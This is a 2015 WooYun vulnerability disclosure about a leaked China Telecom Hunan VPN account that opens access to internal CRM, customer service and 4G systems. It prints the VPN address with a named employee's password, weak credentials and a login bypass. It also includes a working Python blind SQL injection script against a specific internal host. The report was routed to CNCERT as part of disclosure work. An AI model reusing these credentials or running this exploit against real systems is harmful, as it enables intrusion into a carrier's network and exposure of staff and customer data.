当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091835

漏洞标题:中国电信湖南省某同学VPN账号泄露可内网漫游/系统多多

相关厂商:中国电信

漏洞作者: 小饼仔

提交时间:2015-01-14 15:59

修复时间:2015-02-28 16:00

公开时间:2015-02-28 16:00

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-14: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向核心白帽子及相关领域专家公开
2015-02-08: 细节向普通白帽子公开
2015-02-18: 细节向实习白帽子公开
2015-02-28: 细节向公众公开

简要描述:

漫游之~

详细说明:

电信湖南省VPN地址:

https://202.103.124.60/por/login_psw.csp


1111111111111.jpg


VPN账号密码

刘昱国 / 13367472333


漏洞证明:

成功登陆,里面近百个系统

2222222222222.jpg


444444444444.jpg


可以远程连接

55555555555.jpg


部分系统举例
CRM

77777777.jpg


客服系统

88888888.jpg


4G生产

99999999999.jpg


部分系统存在注入

http://134.161.32.140:8020/(S(wnp0nbywuk3sy055pwohmo45))/login.aspx


布尔盲注

991.jpg


猜出当前用户:

992.jpg


验证脚本

#! /usr/bin/env python
#-*-coding:utf-8-*-
import httplib
import time
import string
import sys
import random
import urllib
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
}
payloads = list(string.ascii_lowercase)
for i in range(0,10):
    payloads.append(str(i))
payloads += ['@','_', '.']
print 'start to retrive Oracle user:'
user = ''
for i in range(1,5):
    for payload in payloads:
        conn = httplib.HTTPConnection('134.175.25.9', 9001, timeout=30)
        url = ' /uss/loginAction.do?method=login'
        params = urllib.urlencode(
            {'staffCode': '\' or ascii(substr(lower(user), %s, 1))=%s and \'1\'=\'1' % (i, ord(payload)), 
            'staffPwd': '111',
            'ckbMenuId': 'true',
            'menuId': ''
      
            })
        conn.request('POST',
                     url,
                     params,
                     headers)
        html_doc = conn.getresponse().read().decode('GBK')
    
        if html_doc.find(u'密码不正确') > 0:
            user += payload
            print '\n[in progress]', user
            break
        else:
            print '.',
print '\nOracle user is', user


销售支持网

http://134.175.25.9:9001/uss/


998.jpg


猜到一个湖南省内部知识应用平台的账号密码

http://134.176.1.20:4000/auth!login.do;jsessionid=CA4CF0A2100AE0E96B0B906F6B6AE11C


账号密码

test/123456


994.jpg


省客服10000号

http://134.176.101.10/TFCC10000/index.aspx


995.jpg


工号输入111,登陆模式选应急,直接登陆了

996.jpg


某系统JBOSS未授权访问

997.jpg


其他就不一一举例了

修复方案:

~

版权声明:转载请注明来源 小饼仔@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-01-19 09:31

厂商回复:

CNVD已经确认所述漏洞情况,将转由CNCERT向中国电信通报。

最新状态:

暂无